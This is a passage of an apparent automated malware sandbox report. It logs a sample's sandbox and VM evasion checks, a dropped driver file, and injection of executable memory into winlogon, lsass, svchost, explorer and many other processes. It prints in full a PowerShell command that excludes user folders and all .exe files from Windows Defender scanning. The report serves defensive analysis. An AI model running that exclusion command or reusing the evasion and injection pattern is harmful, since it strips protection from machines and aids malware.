          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Contains functionality to compare user and computer (likely to detect sandboxes)
          Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,25_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,62_2_00000001400010C0
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6261Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3503Jump to behavior
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 2300Jump to behavior
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 7699Jump to behavior
          Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9914Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7844
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1604
          Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9877
          Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1741
          Source: C:\ProgramData\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\jxhirqfmeznn.sysJump to dropped file
          Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_36-14897
          Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_39-14873
          Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_25-480
          Source: C:\Windows\System32\winlogon.exeAPI coverage: 6.8 %
          Source: C:\Windows\System32\lsass.exeAPI coverage: 10.0 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 4.9 %
          Source: C:\Windows\System32\dialer.exeAPI coverage: 0.8 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 4.7 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 4.9 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 6.6 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 6.1 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1376Thread sleep count: 6261 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1376Thread sleep count: 3503 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2896Thread sleep time: -7378697629483816s >= -30000sJump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 6668Thread sleep count: 2300 > 30Jump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 6668Thread sleep time: -2300000s >= -30000sJump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 6668Thread sleep count: 7699 > 30Jump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 6668Thread sleep time: -7699000s >= -30000sJump to behavior
          Source: C:\Windows\System32\lsass.exe TID: 5652Thread sleep count: 9914 > 30Jump to behavior
          Source: C:\Windows\System32\lsass.exe TID: 5652Thread sleep time: -9914000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6548Thread sleep count: 7844 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6548Thread sleep count: 1604 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6692Thread sleep count: 245 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6692Thread sleep time: -245000s >= -30000s
          Source: C:\Windows\System32\dwm.exe TID: 7232Thread sleep count: 9877 > 30
          Source: C:\Windows\System32\dwm.exe TID: 7232Thread sleep time: -9877000s >= -30000s
          Source: C:\Windows\System32\dialer.exe TID: 1508Thread sleep count: 1741 > 30
          Source: C:\Windows\System32\dialer.exe TID: 1508Thread sleep time: -174100s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7268Thread sleep count: 255 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7268Thread sleep time: -255000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7276Thread sleep count: 256 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7276Thread sleep time: -256000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7296Thread sleep count: 256 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7296Thread sleep time: -256000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7304Thread sleep count: 252 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7304Thread sleep time: -252000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7312Thread sleep count: 199 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7312Thread sleep time: -199000s >= -30000s
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
          Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC64DCE0 FindFirstFileExW,30_2_00000225DC64DCE0
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6ADCE0 FindFirstFileExW,30_2_00000225DC6ADCE0
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AEDCE0 FindFirstFileExW,36_2_00000202C0AEDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A66130DCE0 FindFirstFileExW,39_2_000002A66130DCE0
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAEDBDCE0 FindFirstFileExW,40_2_000002BAAEDBDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 65_2_0000026A879CDCE0 FindFirstFileExW,65_2_0000026A879CDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000179537ADCE0 FindFirstFileExW,66_2_00000179537ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D56DCE0 FindFirstFileExW,67_2_000002295D56DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_0000025306E6DCE0 FindFirstFileExW,68_2_0000025306E6DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001845B3ADCE0 FindFirstFileExW,69_2_000001845B3ADCE0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: lsass.exe, 00000024.00000002.3072513252.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
          Source: lsass.exe, 00000024.00000002.3072513252.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
          Source: lsass.exe, 00000024.00000000.1735962142.00000202C0351000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
          Source: svchost.exe, 00000027.00000002.3070357434.000002A660664000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: lsass.exe, 00000024.00000002.3072513252.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
          Source: dwm.exe, 00000028.00000000.1752116163.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
          Source: dwm.exe, 00000028.00000000.1752116163.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: lsass.exe, 00000024.00000002.3071488737.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735514268.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1741081907.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.3069446537.000002A660613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: svchost.exe, 00000027.00000000.1741101910.000002A66062A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_25-413
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_62-468
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_64-91
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000225DC647D90
          Source: C:\Windows\System32\dialer.exeCode function: 64_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,64_2_00000001408460F0
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,25_2_00000001400017EC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000225DC647D90
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC64D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000225DC64D2A4
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000225DC6A7D90
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000225DC6AD2A4
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00000202C0AED2A4
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AE7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00000202C0AE7D90
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A66130D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002A66130D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A661307D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002A661307D90
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAEDB7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_000002BAAEDB7D90
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAEDBD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_000002BAAEDBD2A4
          Source: C:\Windows\System32\dialer.exeCode function: 63_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,63_2_0000000140001160
          Source: C:\Windows\System32\svchost.exeCode function: 65_2_0000026A879CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_0000026A879CD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 65_2_0000026A879C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_0000026A879C7D90
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000179537A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_00000179537A7D90
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000179537AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_00000179537AD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D56D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000002295D56D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D567D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000002295D567D90
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_0000025306E6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_0000025306E6D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_0000025306E67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_0000025306E67D90
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001845B3AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_000001845B3AD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001845B3A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_000001845B3A7D90

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Allocates memory in foreign processes
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAE2A0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC670000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0B10000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A661330000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAED80000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1845B370000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B5644B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2108BCE0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29166940000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19E29D00000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 3440000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
